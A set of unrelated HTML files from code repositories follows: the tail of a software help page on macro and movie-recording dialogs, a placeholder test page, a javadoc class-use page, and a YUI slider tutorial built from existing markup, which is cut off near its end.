style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Move mouse to highlight controls – If the macro was recorded from
the GUI the mouse will move and highlight a control until the control is
processed. Note: If this is selected, the user will have difficulty using the
mouse while the macro runs. </p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Record movie while macro runs – Movie recording is enabled while
the macro runs. </p>
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Create movie after macro finishes – When running of the macro has
completed, a movie is automatically created. When this checkbox transitions
from unchecked to checked, a dialog for movie file selection is displayed.</p>
<span style='font-size:12.0pt;font-family:"Calibri",sans-serif'><br clear=all
style='page-break-before:always'>
</span>
<p class=MsoNormal> </p>
<h1>Macro Dialog with a Macro Command Selected</h1>
<p class=MsoNormal> </p>
<p class=MsoNormal><img width=327 height=523 id="Picture 8"
src="MacrosWorkbench.fld/image003.png"></p>
<p class=MsoNormal> </p>
<p class=MsoNormal>Command</p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Title – Title of the macro command</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>GUI Name – This name is assigned by the GUI to uniquely identify
items in the user-interface that are affected by the selected command.</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>GUI Type – The type of item affected by the macro</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Delay – Amount to wait before the command starts</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Description – Describes the command</p>
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Edit Parameters – The content varies and includes parameters for
the command</p>
<p class=MsoNormal> </p>
<p class=MsoNormal> </p>
<p class=MsoNormal> </p>
<span style='font-size:12.0pt;font-family:"Calibri",sans-serif'><br clear=all
style='page-break-before:always'>
</span>
<p class=MsoNormal> </p>
<h1>Add Macro Command Dialog</h1>
<p class=MsoNormal> </p>
<p class=MsoNormal><img width=281 height=392 id="Picture 2"
src="MacrosWorkbench.fld/image004.png"></p>
<p class=MsoNormal> </p>
<p class=MsoNormal>The Add Macro Command dialog appears when the adds a command
using the Plus button.</p>
<p class=MsoNormal> </p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Type – Selects the type of command. Choices are “Custom
Operation” that performs a special operation and Widget for items in the
user-interface.</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Commands – Lists commands available </p>
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Description – Contains a description of the command</p>
<p class=MsoNormal> </p>
<p class=MsoNormal> </p>
<span style='font-size:12.0pt;font-family:"Calibri",sans-serif'><br clear=all
style='page-break-before:always'>
</span>
<p class=MsoNormal> </p>
<h1>Movie Recording Dialog Main Tab</h1>
<p class=MsoNormal> </p>
<p class=MsoNormal><img width=309 height=326 id="Picture 10"
src="MacrosWorkbench.fld/image005.png"></p>
<p class=MsoNormal> </p>
<p class=MsoNormal>Source</p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Record from Window – Selects window that is recorded</p>
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Record Region – Choose from Graphics (area in which brain models
are drawn) or Window (entire window including toolbar, toolbox, graphics, etc)</p>
<p class=MsoNormal> </p>
<p class=MsoNormal>Recording Mode</p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Automatic – Images are recorded anytime there is an update</p>
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Manual – Pressing the record button will record an image for the
selected number of seconds</p>
<p class=MsoNormal> </p>
<p class=MsoNormal>Output Movie</p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Create Movie – Displays a file selection dialog for selection of
the movie file. If the user clicks the Save button on the file dialog, the
movie is created. Creation of a movie may take some time. The format of the
movie file is based upon the extension of the movie filename. </p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Reset – Erases all recorded images. Typically used if the user
wants to erase a partial recording and start over. In addition, this button
is also used if the user has disabled “Remove temporary images after movie
creation” on the settings tab.</p>
<p class=MsoListParagraphCxSpMiddle> </p>
<p class=MsoListParagraphCxSpMiddle> </p>
<p class=MsoListParagraphCxSpLast> </p>
<h1>Movie Recording Settings Tab</h1>
<p class=MsoNormal> </p>
<p class=MsoNormal><img width=278 height=296 id="Picture 12"
src="MacrosWorkbench.fld/image006.png"></p>
<p class=MsoNormal> </p>
<p class=MsoListParagraphCxSpFirst style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Resolution – Selection the resolution (width/height) of the
movie. This may only be changed when there are no recorded images.</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Custom Resolution – Enabled when Resolution is Custom and allows
user to specify width and height.</p>
<p class=MsoListParagraphCxSpMiddle style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Frames Per Second – Number of frames per second in the movie.
Some Macro Commands contain a duration (seconds) and will use the Frames Per
Second to ensure proper length of movie.</p>
<p class=MsoListParagraphCxSpLast style='text-indent:-.25in'><span
style='font-size:14.0pt;font-family:Symbol'>·<span style='font:7.0pt "Times New Roman"'>
</span></span>Remove temporary images after movie creation – After the movie is
created, image that were used to make the movie are removed. If this is
disabled (usually only for debugging), a new movie may contain recorded images
from a previous movie. Use the “Reset” button on the Main tab to remove the
temporary images.</p>
</div>
</body>
</html>
|
test.html | mikecontrol/cs2x | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Dokument bez tytułu</title>
<style type="text/css">
<!--
body {
font: 100% Verdana, Arial, Helvetica, sans-serif;
background: #666666;
margin: 0; /* zaleca się wyzerowanie dopełnienia i marginesu elementu body, tak aby mogły być uwzględniane różne domyślne ustawienia przeglądarki */
padding: 0;
text-align: center; /* kontener zostaje wyśrodkowany w oknach przeglądarek IE 5*. Następnie tekst określony przez selektor #container jest wyrównywany domyślnie do lewej */
color: #000000;
}
.oneColFixCtr #container {
width: 530px; /* użycie szerokości mniejszej o 20 piks. od pełnej szerokości 800 piks. pozwala uatrakcyjnić okno przeglądarki i uniknąć poziomego paska przewijania */
background: #FFFFFF;
margin: 0 auto; /* automatyczne marginesy (w połączeniu z szerokością) powodują wyśrodkowanie strony */
border: 1px solid #000000;
text-align: left; /* ustawienie to przesłania domyślne ustawienie wyrównania tekstu: środkowanie w elemencie body. */
}
.oneColFixCtr #mainContent {
padding: 0 20px; /* należy pamiętać, że dopełnienie jest to pusty obszar w polu div, a margines jest to pusty obszar poza polem div */
}
-->
</style></head>
<body class="oneColFixCtr">
<div id="container">
<div id="mainContent">
<h1>REMIX Z0NE</h1>
<p>
test test test
</p>
<p></p>
<!-- end #mainContent --></div>
<!-- end #container --></div>
</body>
</html>
|
JNFP/doc/JNFP/class-use/TripIntersection.html | TonyWauters/JNFP | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_60) on Thu May 05 12:28:04 CEST 2016 -->
<title>Uses of Class JNFP.TripIntersection</title>
<meta name="date" content="2016-05-05">
<link rel="stylesheet" type="text/css" href="../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class JNFP.TripIntersection";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../JNFP/package-summary.html">Package</a></li>
<li><a href="../../JNFP/TripIntersection.html" title="class in JNFP">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../index.html?JNFP/class-use/TripIntersection.html" target="_top">Frames</a></li>
<li><a href="TripIntersection.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h2 title="Uses of Class JNFP.TripIntersection" class="title">Uses of Class<br>JNFP.TripIntersection</h2>
</div>
<div class="classUseContainer">
<ul class="blockList">
<li class="blockList">
<ul class="blockList">
<li class="blockList"><a name="JNFP">
<!-- -->
</a>
<h3>Uses of <a href="../../JNFP/TripIntersection.html" title="class in JNFP">TripIntersection</a> in <a href="../../JNFP/package-summary.html">JNFP</a></h3>
<table class="useSummary" border="0" cellpadding="3" cellspacing="0" summary="Use table, listing methods, and an explanation">
<caption><span>Methods in <a href="../../JNFP/package-summary.html">JNFP</a> with parameters of type <a href="../../JNFP/TripIntersection.html" title="class in JNFP">TripIntersection</a></span><span class="tabEnd"> </span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tbody>
<tr class="altColor">
<td class="colFirst"><code>int</code></td>
<td class="colLast"><span class="typeNameLabel">TripIntersectionComparator.</span><code><span class="memberNameLink"><a href="../../JNFP/TripIntersectionComparator.html#compare-JNFP.TripIntersection-JNFP.TripIntersection-">compare</a></span>(<a href="../../JNFP/TripIntersection.html" title="class in JNFP">TripIntersection</a> ti1,
<a href="../../JNFP/TripIntersection.html" title="class in JNFP">TripIntersection</a> ti2)</code> </td>
</tr>
</tbody>
</table>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../JNFP/package-summary.html">Package</a></li>
<li><a href="../../JNFP/TripIntersection.html" title="class in JNFP">Class</a></li>
<li class="navBarCell1Rev">Use</li>
<li><a href="../package-tree.html">Tree</a></li>
<li><a href="../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../index-files/index-1.html">Index</a></li>
<li><a href="../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li>Prev</li>
<li>Next</li>
</ul>
<ul class="navList">
<li><a href="../../index.html?JNFP/class-use/TripIntersection.html" target="_top">Frames</a></li>
<li><a href="TripIntersection.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
sites/all/libraries/yui/docs/slider/slider-from-markup.html | artefactual-labs/trac | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Example: Creating a Slider from Existing Markup</title>
<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=PT+Sans:400,700,400italic,700italic">
<link rel="stylesheet" href="../../build/cssgrids/grids-min.css">
<link rel="stylesheet" href="../assets/css/main.css">
<link rel="stylesheet" href="../assets/vendor/prettify/prettify-min.css">
<link rel="shortcut icon" type="image/png" href="../assets/favicon.png">
<script src="../../build/yui/yui-min.js"></script>
</head>
<body>
<!--
<a href="https://github.com/yui/yui3"><img style="position: absolute; top: 0; right: 0; border: 0;" src="https://s3.amazonaws.com/github/ribbons/forkme_right_darkblue_121621.png" alt="Fork me on GitHub"></a>
-->
<div id="doc">
<div id="hd">
<h1><img src="http://yuilibrary.com/img/yui-logo.png"></h1>
</div>
<h1>Example: Creating a Slider from Existing Markup</h1>
<div class="yui3-g">
<div class="yui3-u-3-4">
<div id="main">
<div class="content"><style scoped>
#demo {
background: #fff;
border: 1px solid #999;
color: #000;
}
#demo .demo-content {
padding: 1ex 1em;
}
#volume_control {
height: 25px;
line-height: 25px;
background: url(../assets/slider/images/sprite.png) repeat-x 0 0;
position: relative;
}
#volume_control label {
font-weight: bold;
margin: 0 1ex 0 1em;
zoom: 1;
}
#volume {
border: 1px inset #999;
height: 16px;
margin-top: 3px;
padding: 0 3px;
text-align: right;
width: 2em;
}
/* Support open/close action for the slider */
#demo .volume-hide #volume_slider {
display: none;
}
#volume_icon {
background: url(../assets/slider/images/sprite.png) no-repeat 0 -25px;
border: 0 none;
height: 25px;
vertical-align: top;
width: 31px;
}
/* move the button text offscreen left */
#volume_icon p {
text-indent: -9999px;
}
/*
* adjust the speaker icon sprite in accordance with volume level and
* active state
*/
#demo .volume-hide .level_0 { background-position: 0 -25px; }
#demo .volume-hide .level_1 { background-position: 0 -50px; }
#demo .volume-hide .level_2 { background-position: 0 -75px; }
#demo .volume-hide .level_3 { background-position: 0 -100px; }
#demo .level_0,
#demo .level_0:hover {
background-position: 0 -125px;
}
#demo .level_1,
#demo .level_1:hover {
background-position: 0 -150px;
}
#demo .level_2,
#demo .level_2:hover {
background-position: 0 -175px;
}
#demo .level_3,
#demo .level_3:hover {
background-position: 0 -200px;
}
#volume_slider {
position: absolute;
top: 25px;
}
/* rail image on the containing box rather than the rail element */
#volume_slider {
background: url(../assets/slider/images/sprite.png) no-repeat 0 -259px;
height: 116px;
width: 31px;
padding-top: 9px;
cursor: arrow;
}
#volume_slider .yui3-slider-rail {
background-image: none;
width: 31px;
}
#volume_slider .yui3-slider-thumb {
height: 17px;
width: 31px;
overflow: hidden;
}
#volume_slider .yui3-slider-thumb img {
position: absolute;
top: -225px;
}
#volume_slider .yui3-slider-disabled .yui3-slider-thumb img {
top: -242px;
}
#demo_sprite {
display: inline;
float: left;
margin-right: 1em;
}
</style>
<div class="intro">
<p>This example illustrates a few points:</p>
<ol>
<li>How to create a Slider using existing markup</li>
<li>How to disable a Slider</li>
<li>How to use an image sprite to create a custom Slider skin</li>
</ol>
<p>The visualization of the Slider is based on the volume control in Mac OS X 10.5, with additional controls included for illustration. <strong>Click on the speaker icon to show the Slider</strong>.</p>
</div>
<div class="example">
<div id="demo" class="yui3-skin-sam"> <!-- You need this skin class -->
<div id="volume_control" class="volume-hide">
<label for="volume">volume</label><input type="text" size="3" maxlength="3" name="volume" id="volume" value="50">
<button type="button" id="volume_icon" class="level_2" title="Open volume slider"><p>Open</p></button>
<span id="volume_slider">
<span class="yui3-slider-rail">
<span class="yui3-slider-thumb"><img src="../assets/slider/images/sprite.png" height="384" width="31"></span>
</span>
</span>
<label for="mute"><input type="checkbox" id="mute"> mute</label>
</div>
<div class="demo-content">
<p>Nulla facilisi. In vel sem. Morbi id urna in diam dignissim feugiat. Proin molestie tortor eu velit. Aliquam erat volutpat. Nullam ultrices, diam tempus vulputate egestas, eros pede varius leo, sed imperdiet lectus est ornare odio.</p>
<p>Phasellus wisi purus, interdum vitae, rutrum accumsan, viverra in, velit. Sed enim risus, congue non, tristique in, commodo eu, metus. Aenean tortor mi, imperdiet id, gravida eu, posuere eu, felis.</p>
</div>
</div>
</div>
<script>
YUI().use("slider", function (Y) {
var control = Y.one('#volume_control'),
volInput = Y.one('#volume'),
icon = Y.one('#volume_icon'),
mute = Y.one('#mute'),
open = false,
level = 2,
beforeMute = 0,
wait,
volume;
Y.one("#volume_slider").setStyle('left',icon.get('offsetLeft')+'px');
volume = new Y.Slider({
axis : 'y',
min : 100,
max : 0,
value : 50,
length: '105px'
});
volume.renderRail = function () {
return Y.one( "#volume_slider span.yui3-slider-rail" );
};
volume.renderThumb = function () {
return this.rail.one( "span.yui3-slider-thumb" );
};
volume.render( "#volume_slider" );
// Initialize event listeners
volume.after('valueChange', updateInput);
volume.after('valueChange', updateIcon);
mute.on('click', muteVolume);
volInput.on({
keydown : handleInput,
keyup : updateVolume
});
icon.on('click', showHideSlider);
Y.one( 'doc' ).on('click', handleDocumentClick );
// Support functions
function updateInput(e) {
if (e.src !== 'KEY') {
volInput.set('value',e.newVal);
}
}
function updateIcon(e) {
var newLevel = e.newVal && Math.ceil(e.newVal / 34);
if (level !== newLevel) {
icon.replaceClass('level_'+level, 'level_'+newLevel);
level = newLevel;
}
}
function muteVolume(e) {
var disabled = !volume.get('disabled');
volume.set('disabled', disabled);
if (disabled) {
beforeMute = volume.getValue();
volume.setValue(0);
volInput.set('disabled','disabled');
} else {
volume.setValue(beforeMute);
volInput.set('disabled','');
}
}
function handleInput(e) {
// Allow only numbers and various other control keys
if (e.keyCode > 57) {
e.halt();
}
}
function updateVolume(e) {
// delay input processing to give the user time to type
if (wait) {
wait.cancel();
}
wait = Y.later(400, null, function () {
var value = parseInt(volInput.get('value'),10) || 0;
if (value > 100) {
volInput.set('value', 100);
value = 100
}
volume.setValue( value );
});
}
function showHideSlider(e) {
control.toggleClass('volume-hide');
open = !open;
if (e) {
e.preventDefault();
}
}
function handleDocumentClick(e) {
if (open && !icon.contains(e.target) &&
!volume.get('boundingBox').contains(e.target)) {
showHideSlider();
}
}
});
</script>
<h3 id="prog_enh">Progressive Enhancement</h3>
<p>The <a href="http://en.wikipedia.org/wiki/Progressive_enhancement">Progressive Enhancement</a> strategy recommends that your page not contain markup that will only be useful in cases where JavaScript is available. For this reason, Slider does not include an <code>HTML_PARSER</code> to reuse existing markup. However, it is possible to override a couple methods to accomplish the task.</p>
<p>The starting markup for the volume control area is as follows:</p>
<pre class="code prettyprint"><div id="volume_control" class="volume-hide">
<label for="volume">volume</label><input type="text" size="3" maxlength="3" name="volume" id="volume" value="50">
<button type="button" id="volume_icon" class="level_2" title="Open volume slider"><p>Open</p></button>
<span id="volume_slider">
<span class="yui3-slider-rail">
<span class="yui3-slider-thumb"><img src="../assets/slider/images/sprite.png" height="384" width="31"></span>
</span>
</span>
<label for="mute"><input type="checkbox" id="mute"> mute</label>
</div></pre>
<p>To tell the Slider to use the existing rail and thumb elements, override the <code>renderRail</code> and <code>renderThumb</code> methods.</p>
<pre class="code prettyprint">var volume = new Y.Slider({
axis : 'y',
min : 100, // reverse min and max to make the top
max : 0, // equal 100 and the bottom 0
value : 50,
length: '105px'
});
// Override renderRail to just return the existing rail node
volume.renderRail = function () {
return Y.one( "#volume_slider span.yui3-slider-rail" );
};
// Override renderThumb to just return the existing thumb node
volume.renderThumb = function () {
return this.rail.one( "span.yui3-slider-thumb" );
};
volume.render( "#volume_slider" );</pre>
<h3 id="syncui">Hide and show the Slider</h3>
<p>By default, we want the Slider to be hidden until the user clicks on the speaker icon. However, we want to support muting or changing the value of the Slider while it is hidden.</p>
<pre class="code prettyprint">var control = Y.one('#volume_control'),
icon = Y.one('#volume_icon'),
open = false;
function showHideSlider(e) {
control.toggleClass('volume-hide');
open = !open;
if (e) {
e.preventDefault();
}
}
icon.on('click', showHideSlider);
// Also support hiding the Slider when the user clicks outside the
// Slider element.
function handleDocumentClick(e) {
if (open && !icon.contains(e.target) &&
!volume.get('boundingBox').contains(e.target)) {
showHideSlider();
}
}
Y.one( 'doc' ).on('click', handleDocumentClick );</pre>
<h3 id="demo_mute">Mute and unmute</h3>
<p>We want to disable the Slider and input and set the value to 0 if a user checks the mute checkbox. The value should be returned to the last assigned value when unmuted. To disable the Slider, set its <code>disabled</code> attribute to <code>true</code>.</p>
<pre class="code prettyprint">var volInput = Y.one('#volume'),
mute = Y.one('#mute'),
beforeMute = 0;
function muteVolume(e) {
// Set disabled to false if currently true; true if currently false
var disabled = !volume.get('disabled');
volume.set('disabled', disabled);
if (disabled) {
beforeMute = volume.getValue();
volume.setValue(0);
volInput.set('disabled','disabled');
} else {
volume.setValue(beforeMute);
volInput.set('disabled','');
}
}
mute.on('click', muteVolume);</pre>
<h3>Skinning and CSS</h3>
<img id="demo_sprite" src="../assets/slider/images/sprite.png" height="384" width="31" alt="Sprite of all custom image resources for this example">
<p>We'll be using the image sprite to the left to create a custom skin. In this design, to keep things simple, the Slider's container and end caps are all rendered together at the bottom of the sprite.</p>
<p>Slider's thumb range is constrained by the rail element, so it wouldn't be appropriate to use this image as the rail's background—the thumb would slide off the ends. Instead, the rail image is assigned as the background to the Slider's containing element <code>#volume_slider</code>. Then the default skin background image is removed on the rail.</p>
<pre class="code prettyprint">/* rail image on the containing box rather than the rail element */
#volume_slider {
background: url("assets/images/sprite.png") no-repeat 0 -259px;
height: 116px;
width: 31px;
padding-top: 9px;
}
#volume_slider .yui3-slider-rail {
background-image: none;
width: 31px;
}
#volume_slider .yui3-slider-thumb {
height: 17px;
width: 31px;
overflow: hidden;
}
#volume_slider .yui3-slider-thumb img {
position: absolute;
top: -225px;
}
#volume_slider .yui3-slider-disabled .yui3-slider-thumb img {
top: -242px;
}</pre>
<p>You can see the full CSS and JavaScript for the other controls in the <a href="#full_code_listing">Full Code Listing</a> below.</p>
<h3 id="full_code_listing">Full Code Listing</h3>
<p>Here is the full markup, CSS, and JavaScript for the entire example, including the volume input and mute controls, and CSS for placing the Slider and setting up the volume icon sprite positioning.</p>
<h4>Markup</h4>
<p>
<strong>Note:</strong> be sure to add the <code>yui3-skin-sam</code> classname to the
page's <code><body></code> element or to a parent element of the widget in order to apply
the default CSS skin. See <a href="http://yuilibrary.com/yui/docs/tutorials/skins/">Understanding Skinning</a>.
</p>
<pre class="code prettyprint"><div id="demo" class="yui3-skin-sam"> <!-- You need this skin class -->
<div id="volume_control" class="volume-hide">
<label for="volume">volume</label><input type="text" size="3" maxlength="3" name="volume" id="volume" value="50">
<button type="button" id="volume_icon" class="level_2" title="Open volume slider"><p>Open</p></button>
<span id="volume_slider">
<span class="yui3-slider-rail">
<span class="yui3-slider-thumb"><img src="../assets/slider/images/sprite.png" height="384" width="31"></span>
</span>
</span>
<label for="mute"><input type="checkbox" id="mute"> mute</label>
</div>
<div class="demo-content">
<p>Nulla facilisi. In vel sem. Morbi id urna in diam dignissim feugiat. Proin molestie tortor eu velit. Aliquam erat volutpat. Nullam ultrices, diam tempus vulputate egestas, eros pede varius leo, sed imperdiet lectus est ornare odio.</p>
<p>Phasellus wisi purus, interdum vitae, rutrum accumsan, viverra in, velit. Sed enim risus, congue non, tristique in, commodo eu, metus. Aenean tortor mi, imperdiet id, gravida eu, posuere eu, felis.</p>
</div>
</div></pre>
<h4 id="full_js">JavaScript</h4>
<pre class="code prettyprint">YUI().use("slider", function (Y) {
var control = Y.one('#volume_control'),
volInput = Y.one('#volume'),
icon = Y.one('#volume_icon'),
mute = Y.one('#mute'),
open = false,
level = 2,
beforeMute = 0,
wait,
volume;
Y.one("#volume_slider").setStyle('left',icon.get('offsetLeft')+'px');
volume = new Y.Slider({
axis : 'y',
min : 100,
max : 0,
value : 50,
length: '105px'
});
volume.renderRail = function () {
return Y.one( "#volume_slider span.yui3-slider-rail" );
};
volume.renderThumb = function () {
return this.rail.one( "span.yui3-slider-thumb" );
};
volume.render( "#volume_slider" );
// Initialize event listeners
volume.after('valueChange', updateInput);
volume.after('valueChange', updateIcon);
mute.on('click', muteVolume);
volInput.on({
keydown : handleInput,
keyup : updateVolume
});
icon.on('click', showHideSlider);
Y.one( 'doc' ).on('click', handleDocumentClick );
// Support functions
function updateInput(e) {
if (e.src !== 'KEY') {
volInput.set('value',e.newVal);
}
}
function updateIcon(e) {
var newLevel = e.newVal && Math.ceil(e.newVal / 34);
if (level !== newLevel) {
icon.replaceClass('level_'+level, 'level_'+newLevel);
level = newLevel;
}
}
function muteVolume(e) {
var disabled = !volume.get('disabled');
volume.set('disabled', disabled);
if (disabled) {
beforeMute = volume.getValue();
volume.setValue(0);
volInput.set('disabled','disabled');
} else {
volume.setValue(beforeMute);
volInput.set('disabled','');
}
}
function handleInput(e) {
// Allow only numbers and various other control keys
if (e.keyCode > 57) {
e.halt();
}
}
function updateVolume(e) {
// delay input processing to give the user time to type
if (wait) {
wait.cancel();
}
wait = Y.later(400, null, function () {
var value = parseInt(volInput.get('value'),10) || 0;
if (value > 100) {
volInput.set('value', 100);
value = 100
}
volume.setValue( value );
});
}
function showHideSlider(e) {
control.toggleClass('volume-hide');
open = !open;
if (e) {
e.preventDefault();
}
}
function handleDocumentClick(e) {
if (open && !icon.contains(e.target) &&
!volume.get('boundingBox').contains(e.target)) {
showHideSlider();
}
}
});</pre>
<h4 id="full_css">CSS</h4>
<pre class="code prettyprint"><style scoped>
#demo {
background: #fff;
border: 1px solid #999;
color: #000;
}
#demo .demo-content {
padding: 1ex 1em;
}
#volume_control {
height: 25px;
line-height: 25px;
background: url(../assets/slider/images/sprite.png) repeat-x 0 0;
position: relative;
}
#volume_control label {
font-weight: bold;
margin: 0 1ex 0 1em;
zoom: 1;
}
#volume {
border: 1px inset #999;
height: 16px;
margin-top: 3px;
padding: 0 3px;
text-align: right;
width: 2em;
}
/* Support open/close action for the slider */
#demo .volume-hide #volume_slider {
display: none;
}
#volume_icon {
background: url(../assets/slider/images/sprite.png) no-repeat 0 -25px;
border: 0 none;
height: 25px;
vertical-align: top;
width: 31px;
}
/* move the button text offscreen left */
#volume_icon p {
text-indent: -9999px;
}
/*
* adjust the speaker icon sprite in accordance with volume level and
* active state
*/
#demo .volume-hide .level_0 { background-position: 0 -25px; }
#demo .volume-hide .level_1 { background-position: 0 -50px; }
#demo .volume-hide .level_2 { background-position: 0 -75px; }
#demo .volume-hide .level_3 { background-position: 0 -100px; }
#demo .level_0,
#demo .level_0:hover {
background-position: 0 -125px;
}
#demo .level_1,
#demo .level_1:hover {
background-position: 0 -150px;
}
#demo .level_2,
#demo .level_2:hover {
background-position: 0 -175px;
}
#demo .level_3,
#demo .level_3:hover {
background-position: 0 -200px;
}
#volume_slider {
position: absolute;
top: 25px;
}
/* rail image on the containing box rather than the rail element */
#volume_slider {
background: url(../assets/slider/images/sprite.png) no-repeat 0 -259px;
height: 116px;
width: 31px;
padding-top: 9px;
cursor: arrow;
}
#volume_slider .yui3-slider-rail {
background-image: none;
width: 31px;
}
#volume_slider .yui3-slider-thumb {
height: 17px;
width: 31px;
overflow: hidden;
}
#volume_slider .yui3-slider-thumb img {
position: absolute;
top: -225px;
}
#volume_slider .yui3-slider-disabled .yui3-slider-thumb img {
top: -242px;
}
#demo_sprite {
display: inline;
float: left;
margin-right: 1em;
}
</style></pre>
</div>
</div>
</div>
<div class="yui3-u-1-4">
<div class="sidebar">
<div class="sidebox">
<div class="hd">
<h2 class="no-toc">Examples</h2>
</div>
<div class="bd">
<ul class="examples">
<li data-description="The basics of setting up a horizontal and vertical Slider">
<a href="slider-basic.html">Basic Sliders</a>
</li>
<li data-description="Creating a vertical Slider from existing markup">
<a href="slider-from-markup.html">Creating a Slider from Existing Markup</a>
</li>
<li data-description="Specifying an alternate skin for a Slider instance">
<a href="slider-skin.html">Alternate Skins</a>
</li>
</ul>
</div>
</div>
<div class="sidebox">
<div class="hd">
<h2 class="no-toc">Examples That Use This Component</h2>
</div>
<div class="bd">
<ul class="examples">
